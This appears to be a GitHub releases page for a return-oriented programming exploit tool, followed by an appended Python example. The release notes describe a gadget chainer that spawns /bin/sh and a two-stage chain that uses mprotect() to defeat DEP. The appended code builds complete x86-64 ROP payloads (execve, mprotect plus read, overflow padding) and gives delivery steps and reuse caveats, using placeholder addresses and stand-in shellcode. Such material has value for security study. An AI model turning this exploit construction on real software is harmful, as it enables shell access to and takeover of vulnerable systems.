
Releases: ROPilicious/src

A Delicious Exploit That Defeats DEP

21 Mar 07:18

Using the primitive tool from v1.0, we crafted an exploit that invokes the mprotect() system call, which changes the memory protections of a given range of pages. We use it to make the writable .data section executable as well, so that code of our choosing can be injected there and run, defeating the W^X (DEP) protection that modern operating systems apply to the stack and data segments.

It is a 2-stage exploit.

  1. The first stage is the ROP payload: it chains gadgets to execute the mprotect system call, makes the .data section executable, and injects traditional shellcode into .data.

  2. The second stage runs that shellcode - the classic way to exploit a system!

Primitive ROP tool

20 Mar 19:44

Finds gadgets in the target executable using syntactic (instruction-pattern matching) methods and chains them into an exploit.
The exploit function is defined to be execve('/bin/sh').
If the vulnerable executable contains the right instructions, a payload is generated.
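The two chains described in these notes, the v1.0 execve('/bin/sh') payload and the two-stage mprotect() payload above, as an added worked example; this is not ROPilicious' own code. It targets x86-64 Linux without PIE or ASLR, so every address is fixed: the gadget addresses, the .data and "/bin/sh" addresses, the overflow offset and the int3 stand-in shellcode are all constructed. It also assumes stage 1 pulls the shellcode into .data with a read(0, ...) syscall before returning into it, which is one way to do the injection the note mentions, not necessarily the tool's.

```python
"""Build x86-64 Linux ROP payloads: execve("/bin/sh") and a two-stage
mprotect()-then-shellcode chain. Added example, not the project's code."""
import struct
from dataclasses import dataclass

PAGE = 0x1000            # page size mprotect() works in; addresses must be page-aligned
SYS_READ = 0
SYS_MPROTECT = 10
SYS_EXECVE = 59
PROT_RWX = 7             # PROT_READ | PROT_WRITE | PROT_EXEC


@dataclass(frozen=True)
class Gadgets:
    """Addresses of the five gadgets a raw-syscall chain needs (each 'pop' ends in ret)."""
    pop_rax: int
    pop_rdi: int
    pop_rsi: int
    pop_rdx: int
    syscall: int


# Hypothetical addresses for a non-PIE binary; a real run takes these from a
# gadget search over the target's .text.
GADGETS = Gadgets(pop_rax=0x401001, pop_rdi=0x401003, pop_rsi=0x401005,
                  pop_rdx=0x401007, syscall=0x401009)
DATA_ADDR = 0x404050     # hypothetical writable slot inside .data
BIN_SH = 0x402000        # hypothetical address of "/bin/sh\0" in .rodata
SHELLCODE = b"\xcc" * 32  # stand-in for real stage-2 shellcode (int3 x32)


def p64(value: int) -> bytes:
    """Pack one little-endian qword, the unit a ret/pop consumes from the stack."""
    return struct.pack("<Q", value)


def page_range(addr: int, length: int) -> tuple[int, int]:
    """Round [addr, addr+length) out to page boundaries.
    mprotect() fails with EINVAL on an unaligned start address, and the length
    must cover every byte of shellcode that will execute."""
    start = addr & ~(PAGE - 1)
    end = (addr + length + PAGE - 1) & ~(PAGE - 1)
    return start, end - start


def syscall_chain(g: Gadgets, nr: int, rdi: int, rsi: int, rdx: int) -> bytes:
    """rax = nr; rdi, rsi, rdx = args; syscall. Nine qwords."""
    return b"".join([
        p64(g.pop_rax), p64(nr),
        p64(g.pop_rdi), p64(rdi),
        p64(g.pop_rsi), p64(rsi),
        p64(g.pop_rdx), p64(rdx),
        p64(g.syscall),
    ])


def execve_chain(g: Gadgets, binsh_addr: int) -> bytes:
    """v1.0-style payload: execve("/bin/sh", NULL, NULL)."""
    return syscall_chain(g, SYS_EXECVE, binsh_addr, 0, 0)


def mprotect_stage1(g: Gadgets, data_addr: int, shellcode: bytes) -> bytes:
    """Stage 1: make the .data page(s) RWX, read stage 2 into them from stdin
    (assumed injection mechanism), then return into the shellcode."""
    start, length = page_range(data_addr, len(shellcode))
    chain = syscall_chain(g, SYS_MPROTECT, start, length, PROT_RWX)
    chain += syscall_chain(g, SYS_READ, 0, data_addr, len(shellcode))
    return chain + p64(data_addr)            # final ret lands in now-executable .data


def build_payload(g: Gadgets, offset_to_ret: int, data_addr: int, shellcode: bytes) -> bytes:
    """Overflow padding up to the saved return address, then the stage-1 chain."""
    return b"A" * offset_to_ret + mprotect_stage1(g, data_addr, shellcode)


def describe(chain: bytes, g: Gadgets) -> list:
    """Decode a chain back into (gadget, operand) steps for inspection."""
    names = {g.pop_rax: "pop rax", g.pop_rdi: "pop rdi", g.pop_rsi: "pop rsi",
             g.pop_rdx: "pop rdx", g.syscall: "syscall"}
    words = list(struct.unpack("<%dQ" % (len(chain) // 8), chain))
    steps, i = [], 0
    while i < len(words):
        name = names.get(words[i])
        if name is None:                      # a bare return target, e.g. into .data
            steps.append(("ret", words[i])); i += 1
        elif name.startswith("pop"):          # gadget plus the value it pops
            steps.append((name, words[i + 1])); i += 2
        else:
            steps.append((name, None)); i += 1
    return steps


if __name__ == "__main__":
    for step in describe(mprotect_stage1(GADGETS, DATA_ADDR, SHELLCODE), GADGETS):
        print(step)
    # Delivery order: send build_payload(...) into the overflow, then SHELLCODE on stdin.
```

Two caveats a practitioner should check before reusing this shape: the qwords contain NUL bytes, so the overflow must be length-based (read, fread, recv) rather than a string copy, and mprotect() covers whole pages, so the RWX grant also covers any other .data variables sharing those pages.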